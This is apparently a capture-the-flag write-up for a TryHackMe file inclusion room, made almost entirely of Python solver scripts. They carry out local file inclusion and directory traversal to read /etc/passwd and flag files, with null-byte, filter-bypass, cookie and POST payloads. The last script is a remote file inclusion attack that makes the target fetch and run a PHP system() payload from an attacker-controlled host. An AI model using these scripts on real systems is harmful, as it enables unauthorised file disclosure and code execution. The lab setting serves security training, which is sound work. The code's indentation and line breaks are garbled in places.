Link: https://tryhackme.com/room/fileinc
This room introduces file inclusion vulnerabilities, including Local File Inclusion (LFI), Remote File Inclusion (RFI), and directory traversal.
I have solved all the challenges using python. So, feel free to run the code and check if it is successful for you as well.
Lab #1
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found LFI***")
payload = '/etc/passwd'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))
def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab1.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")
if __name__ == "__main__":
main()
Lab #2
import requests
import re
pattern = re.compile(rb"include\((.*?)/"",re.DOTALL)def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found Folder***")
payload = '"'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[0].decode("utf-8"))
def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab2.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")
if __name__ == "__main__":
main()
Lab #3
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found LFI***")
payload = '../../../../etc/passwd%00'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))
def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab3.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")
if __name__ == "__main__":
main()
Lab #4
import requestsdef LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"file_get_contents" in response.content:
print("*** Found Function***")
print("file_get_contents")
def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab4.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")
if __name__ == "__main__":
main()
Lab #5
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Warning" in response.content and b"include()" in response.content:
print("*** Found LFI***")
payload = '....//....//....//....//etc/passwd'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))
def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab5.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")
if __name__ == "__main__":
main()
Lab #6
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)def LFI(url, parameter):
payload = ''
response = requests.get(f"{url}?{parameter}={payload}")
if response.status_code == 200 and b"Access Denied" in response.content:
print("*** Found LFI***")
payload = 'THM-profile/../../../../etc/os-release'
response = requests.get(f"{url}?{parameter}={payload}")
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))
def main():
ip = '10.10.72.183'
url = 'http://'+ip+'/'
response = requests.get(url)
url = url + 'lab6.php'
parameter = 'file'
if response.status_code == 200:
LFI(url,parameter)
else:
print("Error, check the URL")
if __name__ == "__main__":
main()
flag1
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)def main():
url = 'http://10.10.72.183/challenges/chall1.php'
data = {"file":"/etc/flag1"}
response = requests.post(url, data)
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))
if __name__ == '__main__':
main()
flag2
import requests
import re
pattern = re.compile(rb"<code>.*</div>(.*?)</code>", re.DOTALL)def main():
url = 'http://10.10.72.183/challenges/chall2.php'
cookie = {"THM":"../../../../etc/flag2%00"}
response = requests.get(url, cookies=cookie)
data = (response.content)
matches = pattern.findall(data)
print(matches[0].decode("utf-8"))
if __name__ == '__main__':
main()
flag3
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)def main():
url = 'http://10.10.72.183/challenges/chall3.php'
data = {"file":"../../../../etc/flag3\x00"}
response = requests.post(url, data)
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))
if __name__ == '__main__':
main()
rce.txt
<?PHP
echo system('hostname')
?>
rce.py
import requests
import re
pattern = re.compile(rb"<code>(.*?)</code>", re.DOTALL)def main():
url = 'http://10.10.72.183/playground.php?file=http://10.13.22.219:8000/rce.txt'
response = requests.get(url)
data = (response.content)
matches = pattern.findall(data)
print(matches[1].decode("utf-8"))
if __name__ == '__main__':
main()
Hay Yay!!!
Please give me a clap if you found it to be helpful and follow me to get more Security knowledge.